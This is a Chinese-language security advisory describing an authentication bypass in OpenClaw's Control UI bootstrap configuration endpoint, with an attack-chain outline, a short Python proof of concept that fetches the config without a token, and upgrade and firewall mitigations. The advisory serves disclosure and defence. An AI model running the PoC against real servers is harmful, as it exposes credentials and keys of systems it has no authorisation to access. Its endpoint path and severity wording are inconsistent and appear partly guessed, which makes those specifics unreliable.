CVE-2026-44994 OpenClaw认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44994

漏洞类型

认证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.22之前的版本存在认证绕过漏洞。由于Control UI的bootstrap配置端点在实现上缺乏有效的访问控制机制，未正确校验Gateway token，导致未经授权的攻击者可以无需认证直接访问该端点，读取敏感配置信息，造成极其严重的数据泄露。

技术细节

该漏洞源于OpenClaw Control UI的bootstrap配置端点在安全验证逻辑上存在缺陷。在正常的业务流程中，访问该端点应当要求客户端提交有效的Gateway token，以确保只有经过身份验证的Control UI会话才能获取配置。然而，在受影响的版本中，开发人员遗漏了对该特定路由的中间件验证或权限检查。这使得攻击者能够通过向目标服务器发送特制的HTTP请求，直接访问/bootstrap/config路径（或类似端点），从而完全绕过身份验证机制。成功利用此漏洞后，攻击者可以读取服务器返回的敏感bootstrap配置信息，这些信息可能包含内部服务地址、凭证、加密密钥等。由于攻击无需用户交互且网络攻击向量复杂度低，该漏洞具有较高的被利用风险，可能导致后续的渗透攻击。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络以识别OpenClaw实例，并定位其Control UI接口。

STEP 2

2. 漏洞探测

攻击者向bootstrap配置端点发送HTTP请求，观察是否需要认证。

STEP 3

3. 执行攻击

攻击者发送不带Gateway token的请求直接访问端点，利用认证绕过缺陷。

STEP 4

4. 数据窃取

服务器返回敏感的配置信息，攻击者解析并保存这些数据以用于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-openclaw-server/api/bootstrap/config"

try:
    # Send GET request without authentication headers (Token bypass)
    # The vulnerability allows access without a valid Gateway token
    response = requests.get(target_url, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit successful! Sensitive configuration data obtained:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.4.22

防御指南

临时缓解措施

建议立即将OpenClaw升级至2026.4.22或更高版本以修复此漏洞。若无法立即升级，应通过防火墙或WAF规则阻断外部网络对Control UI bootstrap配置端点的访问，或仅允许受信任的内部IP地址连接，同时检查系统日志以确认是否遭受过未授权访问。